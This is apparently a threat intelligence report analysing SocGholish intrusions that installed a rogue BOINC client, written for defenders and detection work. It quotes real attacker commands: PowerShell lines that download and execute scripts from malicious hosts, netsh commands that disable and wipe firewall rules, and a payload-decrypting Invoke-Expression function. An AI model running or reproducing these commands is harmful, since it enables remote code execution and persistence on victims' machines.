Summary
Beginning in early July 2024, Arctic Wolf responded to multiple SocGholish/FakeUpdate intrusions that resulted in a seemingly benign payload being delivered as a second-stage download. The zip file payload contained software from the Berkeley Open Infrastructure for Network Computing (BOINC) project, open-source software that allows users to contribute computing power to scientific research projects focused on solving complex calculations. Notably, multiple BOINC message board users observed nearly identical activity, indicating this could be linked to a larger campaign. Our managed detection and response (MDR) team interrupted and contained the intrusions before the actions on objectives phase, which limited our analysis into how or why the threat actors were using BOINC to further their objectives.
On July 17, Huntress published a blog detailing similar findings to ours. Their blog contains additional insights into this campaign. Combining details from both blogs can help your organization better understand the threat and develop potential detections for this activity.
Technical Analysis
The victim visited a compromised website associated with SocGholish and received a download of Update.js. The JavaScript file was then executed via Windows Script Host (wscript.exe). Upon execution, Update.js leverages PowerShell’s Invoke-WebRequest (iwr) to download a PowerShell script with a Scalable Vector Graphics (SVG) extension, f15.svg, from rzegzwre[.]top and executes it using Invoke-Expression.
The domain was registered by the registrant organization, Xiazhong inc, with NiceNIC.net on May 6, 2024. Since its registration, the domain has been observed hosting PowerShell scripts following a similar naming convention with the use of the .svg file extension.
\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -w h -c \"iwr -usebasicparsing http://rzegzwre.top/f15.svg |iex\"
Although we were not able to review the contents of the PowerShell script with the .svg extension, we observed another PowerShell process being created immediately after the script was executed. When invoked, f15.svg leverages PowerShell to download an additional file (1.php?s=boicn) via curl and invoke it.
\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -c curl -useb 216.245.184.105/1.php?s=boicn| iex
Ultimately, this leads to the download of a BOINC client and scheduled task creation.
The PowerShell script was obfuscated and contained two embedded resources which are base64 encoded with an XOR key. Each embedded resource is passed into a function dedicated to decoding the resource. The first part of the script essentially extracted one of the embedded resources, a compressed zip archive that contains the BOINC client (boinc.exe) and its configuration files (cc_config.xml, global_prefs.xml, and account_rosetta.xml). The account_rosetta.xml file is the account file that contains the weak account key used to attach computers to the threat actors project. BOINC users can designate their own computation projects and distribute pre-configured binaries accordingly. In this case, the threat actors were impersonating the legitimate project Rosetta@home by using a similar project name –rosettahome — and a similarly named domain for the master URL (hxxp://rosettahome[.]top/rosettahome). No tasks were on the fake project server.
rosettahome[.]top default project landing page
The second decoded resource is a PowerShell script that is responsible for extracting the contents of the decoded zip archive, installing BOINC, and creating a scheduled task to execute the BOINC client.
This PowerShell script first creates a new directory under the Windows %APPDATA% directory and then creates a sub-directory using one of the following strings:
'Software Publishing Updates' 'Licensing Validator Updater' 'EULA Updater' 'Secure Transaction Systems'
The string used for the sub-directory name is selected randomly using the PowerShell Get-Random function and the parameters of -Minimum 1 -Maximum 5. This random number is used throughout the script to control various parameters.
Once the directory is created, a new file name for the BOINC executable is chosen using the same random number from the previous step and one of the following values:
'whost' 'trustedinstaller' 'SecurityHealthService' 'gupdate'
The zip archive extracted earlier is then extracted to the installation directory and renamed. The script then creates a scheduled task that runs BOINC every 15 minutes under one of the following task names:
'Google_Maintenance' 'MoziilaUpdateService' 'CleanUpMgrTask' 'System_Health_Service'
Note: Typo of Mozilla in script
Lastly, the script updates the Windows registry to create a new registry key with the value of ‘1′ in the following path: HKEY_CURRENT_USER\Software\Microsoft\ExpirienceHost (Note: Typo of ‘Experience’ in script).
Installation Process
Follow-on Activity
We did not observe any additional activity or network traffic associated with the BOINC client after the initial scheduled task. However, shortly after the scheduled task creation, we observed the PowerShell script f15.svg use net.exe to identify Administrators in the local group.
C:\\Windows\\system32\\net.exe\ localgroup Administrators
We observed additional activity via firewall enumeration and attempts to manipulate the firewall to control its behaviour.
# Adds PowerShell as an allowed program through the firewall netsh firewall add allowedprogram C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe SystemUpdate ENABLE # Show state of all firewall profiles netsh advfirewall show allprofiles state # Sets the default inbound and outbound actions (block) netsh advfirewall set allprofiles firewallpolicy blockinbound,blockoutbound # Removes all rule definitions from the device netsh advfirewall firewall delete rule all
We also observed the threat actor leverage whoami.exe to enumerate groups.
C:\\Windows\\System32\\whoami.exe\ /groups
Subsequently, a script creates a scheduled task named Get-TargetPort that would run a PowerShell function every three minutes. The scheduled task executes the AzureGet-TargetPort function that reads the encrypted bytes from a file (Get-TargetPort.log), decrypts the bytes using the [System.Security.Cryptography.ProtectedData]::Unprotect API call and executes the resulting UTF-8 output using Invoke-Expression. The AzureGet-TargetPort function is loaded from the user’s PowerShell profile, however, it was not clear which stage of the payload execution the function was loaded into the profile. We were not able to review the contents of the Get-TargetPort.log file to garner additional insight into what was being invoked.
function AzureGet-TargetPort {
Add-Type -AssemblyName 'System.Security';
$oebjtkxh=[System.IO.File]::ReadAllBytes('C:\\Users\\USERNAME\\AppData\\Local\\Microsoft\\Windows\\Get-TargetPort.log');
$pdbyoxmhzeswtj = [System.Security.Cryptography.ProtectedData]::Unprotect($oebjtkxh, $null, [System.Security.Cryptography.DataProtectionScope]::Localmachine);
Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($pdbyoxmhzeswtj))
}
Lastly, we observed the threat actor attempting to set up a local proxy server by adding a registry key to
HKU\\S-1-5-21-709456175-1850693151-1850952788-69262\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyServer
Tactics, Techniques, And Procedures (TTPs)
| Tactic | Technique | Sub-techniques |
|---|---|---|
| Initial Access | T1189: Drive-by Compromise | |
| Execution | T1059: Command and Scripting Interpreter | • T1059.007: JavaScript • T1059.001: PowerShell • T1059.003: Windows Command Shell |
| T1053: Scheduled Task/Job | • T1053.005: Scheduled Task | |
| Persistence | T1653: Power Settings | |
| Defense Evasion | T1140: Deobfuscate/Decode Files or Information | |
| T1112: Modify Registry | ||
| T1027: Obfuscated Files or Information | • T1027.010: Command Obfuscation • T1027.013: Encrypted/Encoded File |
|
| Discovery | T1087: Account Discovery | • T1087.001: Local Account • T1087.002: Domain Account |
| Command and Control | T1105: Ingress Tool Transfer | |
| T1090: Proxy | T1090.001: Internal Proxy |
How Arctic Wolf Protects Its Customers
Arctic Wolf is committed to helping customers reduce their cyber risk, so when active SocGholish campaigns are identified we quickly move to keep them protected.
Arctic Wolf Labs has leveraged threat intelligence around SocGholish TTPs to implement new detections in the Arctic Wolf® Security Operations Platform to protect Arctic Wolf® Managed Detection and Response (MDR) customers. As we discover new information about this threat, we will enhance our detections to account for additional indicators of compromise (IOCs) and techniques leveraged by the SocGholish malware.
Conclusion
Based on our analysis, these intrusions are not the result of a vulnerability in BOINC. Due to BOINC being open source and freely available, threat actors can easily leverage it to create rogue or spoofed BOINC projects to trick users. The threat actor is installing a legitimate BOINC client and configuring it to connect to their own server. Few details are known as to why the threat actor is installing the BOINC client; due to our MDR team interrupting the intrusion chain we were not able to identify traffic back to the threat actor owned server. The abuse of open source software is not new or novel. Threat actors consistently leverage freely available software to carry out malicious actions during an intrusion. However, this is the first case of a threat actor abusing BOINC to further their goals.
We will continue to investigate similar intrusions to better understand the threat and enhance our detections. The BOINC project is also actively investigating nearly identical intrusions observed by their forum members. Arctic Wolf Labs reached out to the University of Berekeley to notify them of our observed malicious use of BOINC, but did not receive a communication back.
Appendix
Indicators of Compromise (IoCs)
| Indicator | Type | Description |
| qalw.fans.smalladventureguide[.]com | URL | SocGholish associated domain |
| 87593c20fa6361408d9c1c53180074a9224df1623ff2bd8c1c2961346d5a38df | SHA256 | Obfuscated PowerShell script that contains two embedded resources. (1.php?s=boicn) |
| 187dc7454a18af3a4dd7d386e1cf7ab522664d8b6e30ddc2dae5204403bc5504 | SHA256 | Zip file containing BOINC client and configuration files |
| 5BDDE3507BE7030F022B5D48E8088D419C6B04B422B81E327C2A19547C212797 | SHA256 | BOINC installer script |
| http[:]//rosettahome[.]top/rosettahome/ | URL | Main URL for Hosted BOINC Server |
| yxh.parish.chuathuongxot[.]org | Domain | Observed DNS query; SocGholish associated domain |
| http[:]//rzegzwre[.]top/f15.svg | URL | First stage payload URL |
| 216.245.184[.]105/1.php?s=boicn | URL | Second stage payload URL |
| gggkmibncajjjic[.]top | Domain | Observed DNS query |
| f04tb1itjdltmym[.]top | Domain | Observed DNS query |
Note: rzegzwre[.]top and multiple other domains observed in our logs were tied to a single registrant organization, Xiazhong inc. By pivoting on this registrant organization, additional associated domains can be found matching the naming convention and registrar.
Additional Resources
Get forward-thinking insights along with practical guidance you can apply to your organization in the Arctic Wolf Labs 2024 Threat Report.
Learn what’s new, what’s changed, and what’s ahead for the cybersecurity landscape, with insights from 1,000 global IT and security leaders in the Arctic Wolf State of Cybersecurity: 2024 Trends Report.
About Arctic Wolf Labs
Arctic Wolf Labs is a group of elite security researchers, data scientists, and security development engineers who explore security topics to deliver cutting-edge threat research on new and emerging adversaries, develop and refine advanced threat detection models with artificial intelligence, including machine learning, and drive continuous improvement in the speed, scale, and detection efficacy of Arctic Wolf’s solution offerings. With their deep domain knowledge, Arctic Wolf Labs brings world-class security innovations to not only Arctic Wolf’s customer base, but the security community at large.
Steven Campbell
Steven Campbell is a Lead Threat Intelligence Researcher at Arctic Wolf Labs and has more than eight years of experience in intelligence analysis and security research. He has a strong background in infrastructure analysis and adversary tradecraft.
Akshay Suthar
Akshay Suthar is a Senior Threat Intelligence Researcher at Arctic Wolf Labs focused on researching adversary tradecraft and malware analysis. He has more than seven years of experience in a multitude of domains including threat intelligence research, detection engineering, and intrusion analysis.
Markus Neis
Markus Neis is a Principal Threat Intelligence Researcher in Arctic Wolf Labs focused on leading advanced threat research. He has more than a decade of experience in researching adversary tradecraft and responding to sophisticated attacks.
Trevor Daher
Trevor Daher is a Technical Lead within Arctic Wolf’s Security Services group supporting the Managed Detection and Response (MDR) service. He has 7 years’ industry experience as a security analyst and as a security consultant.
Jon Grimm
Jon is a Threat Intelligence Analyst at Arctic Wolf dedicated to identifying new cyber threats and producing actionable intelligence that enhances organizational defenses. He has background of 10 years’ experience in several domains of cybersecurity, holds a bachelor’s degree in law enforcement, and holds several industry certifications (CISSP, GCFA, GCTI)
Stefan Hostetler
Stefan is a Senior Threat Intelligence Researcher at Arctic Wolf. With over a decade of industry experience under his belt, he focuses on extracting actionable insight from novel threats to help organizations protect themselves effectively.
Christopher Prest
Christopher is a Lead Security Researcher and a 17-year veteran in Software and Application security development, coupled with 2 years of cutting edge detection engineering and security research. A seasoned expert, Christopher focuses on Malware analysis and reverse engineering to shape the future of cybersecurity.
